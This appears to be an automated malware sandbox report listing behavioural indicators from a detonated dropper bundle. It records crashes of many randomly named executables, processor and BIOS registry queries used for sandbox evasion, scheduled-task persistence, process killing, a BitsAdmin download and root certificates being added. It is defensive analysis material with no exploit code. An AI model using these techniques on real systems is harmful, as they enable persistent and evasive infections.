File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe
File opened for modification C:\Windows\Installer\MSI382D.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSI601D.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSI6DCB.tmp msiexec.exe
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe
File opened for modification C:\Windows\System\svchost.exe QPeacnpa5OCyBgRir69RuR8o.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 26 IoCs
Processes:
WerFault.exe (26 instances)
pid pid_target process target process
4656 584 WerFault.exe Mon11bc113a5813.exe
232 1416 WerFault.exe Mon11991188390d59.exe
1448 852 WerFault.exe Mon112c3d79b6fdf8.exe
2004 4516 WerFault.exe rundll32.exe
232 5232 WerFault.exe 4.exe
6152 1248 WerFault.exe Mon1190ed9443.exe
6592 2672 WerFault.exe Mon11a22bde2b.exe
5176 3056 WerFault.exe Soft1WW02.exe
6708 1452 WerFault.exe Pro.exe
5332 5856 WerFault.exe 4mulY6HX0OKjNh4y5va_iEdo.exe
3004 3700 WerFault.exe WQ_0DNHwegoB5QOHvlIZntSr.exe
4296 5688 WerFault.exe HGnD7vZ80Dldb3sA9NYHS6wO.exe
4760 5204 WerFault.exe p9IkKDDHEvPP_0EBsFu2v6aq.exe
3632 2964 WerFault.exe setup_2.exe
6928 7040 WerFault.exe K0j8f5iqbfnfHvcNjJcr34Ek.exe
7524 3720 WerFault.exe 4Uf7hX9wKWamDH8f4X0RB_qb.exe
6120 3500 WerFault.exe tDQQVMK4kh5kC_VXdu6mwGw2.exe
1568 5500 WerFault.exe W2JFSO1Ax2gZg76M0IGV9hjG.exe
4728 5204 WerFault.exe GBI_yH9a9U9c0kT8e_JoFRwy.exe
4564 3308 WerFault.exe GcleanerEU.exe
500 6584 WerFault.exe GcleanerEU.exe
6208 7136 WerFault.exe rundll32.exe
7028 2800 WerFault.exe rundll32.exe
6312 5052 WerFault.exe gcleaner.exe
6904 3000 WerFault.exe gcleaner.exe
7376 3764 WerFault.exe EASS.exe
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, msedge.exe, cmd.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, CrowdInspect.exe, WerFault.exe, taskkill.exe, WerFault.exe, WerFault.exe, cutm3.exe, WerFault.exe, WerFault.exe, cmd.exe, WerFault.exe, WerFault.exe, fLt5aaWDMdJHJUJsdaAbuivD.exe, CrowdInspect.exe, powershell.exe
description ioc process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cmd.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CrowdInspect.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier taskkill.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier cutm3.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision cmd.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 taskkill.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 cmd.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 fLt5aaWDMdJHJUJsdaAbuivD.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CrowdInspect.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString fLt5aaWDMdJHJUJsdaAbuivD.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 powershell.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 taskkill.exe
-
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exe (9 instances)
pid process
1944 schtasks.exe
5740 schtasks.exe
5140 schtasks.exe
7656 schtasks.exe
1508 schtasks.exe
860 schtasks.exe
1912 schtasks.exe
1500 schtasks.exe
4140 schtasks.exe
-
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exe, timeout.exe
pid process
6916 timeout.exe
2984 timeout.exe
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 56 IoCs
Processes:
WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, msedge.exe, msedge.exe, WerFault.exe, WerFault.exe, WerFault.exe, cmd.exe, taskkill.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, cutm3.exe, WerFault.exe, WerFault.exe, WerFault.exe
description ioc process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU taskkill.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cutm3.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS taskkill.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cutm3.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
-
Kills process with taskkill 6 IoCs
Processes:
taskkill.exe (6 instances)
pid process
7584 taskkill.exe
5652 taskkill.exe
5716 taskkill.exe
456 taskkill.exe
6152 taskkill.exe
676 taskkill.exe
-
Modifies data under HKEY_USERS 51 IoCs
Processes:
sihclient.exe, svchost.exe, svchost.exe
description ioc process
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02lrqqzjiojuqmiq\DeviceId = "<Data LastUpdatedTime=\"1626948653\"><User username=\"02LRQQZJIOJUQMIQ\"><HardwareInfo BoundTime=\"1626948652\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\WnfLastTimeStamps\WNF_LIC_HARDWAREID_IN_DEVICE_LICENSE_IN_TOLERANCE = "1634563806" svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL svchost.exe
Key created \REGISTRY\USER\.Default\Software\Microsoft\IdentityCRL\WnfLastTimeStamps svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0" svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" svchost.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02lrqqzjiojuqmiq\DeviceId = "<Data LastUpdatedTime=\"1626948653\"><User username=\"02LRQQZJIOJUQMIQ\"><HardwareInfo BoundTime=\"1626948652\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"11\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe
-
Modifies registry class 5 IoCs
Processes:
CrowdInspect.sfx.exe, Settings.exe
description ioc process
Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ CrowdInspect.sfx.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ CrowdInspect.sfx.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ CrowdInspect.sfx.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ CrowdInspect.sfx.exe
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{E584FF88-EC9D-4E53-92B9-109F6A44962F} Settings.exe
-
Processes:
setting.exe, installer.exe
description ioc process
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E setting.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 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 setting.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 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 setting.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 installer.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exe, msedge.exe, CrowdInspect64.exe
pid process
4024 msedge.exe
4024 msedge.exe
4284 msedge.exe
4284 msedge.exe
1816 CrowdInspect64.exe (row repeated 60 times)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
CrowdInspect64.exe
pid process
1816 CrowdInspect64.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs
Processes:
msedge.exe, msedge.exe
pid process
4284 msedge.exe
4284 msedge.exe
232 msedge.exe (row repeated 18 times)
-
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
WinHoster.exe
pid process
6236 WinHoster.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
svchost.exe, CrowdInspect64.exe
description pid process
Token: SeSystemtimePrivilege 3816 svchost.exe
Token: SeSystemtimePrivilege 3816 svchost.exe
Token: SeIncBasePriorityPrivilege 3816 svchost.exe
Token: SeDebugPrivilege 1816 CrowdInspect64.exe (row repeated 61 times)
-
Suspicious use of FindShellTrayWindow 9 IoCs
Processes:
pid   process
4284  msedge.exe
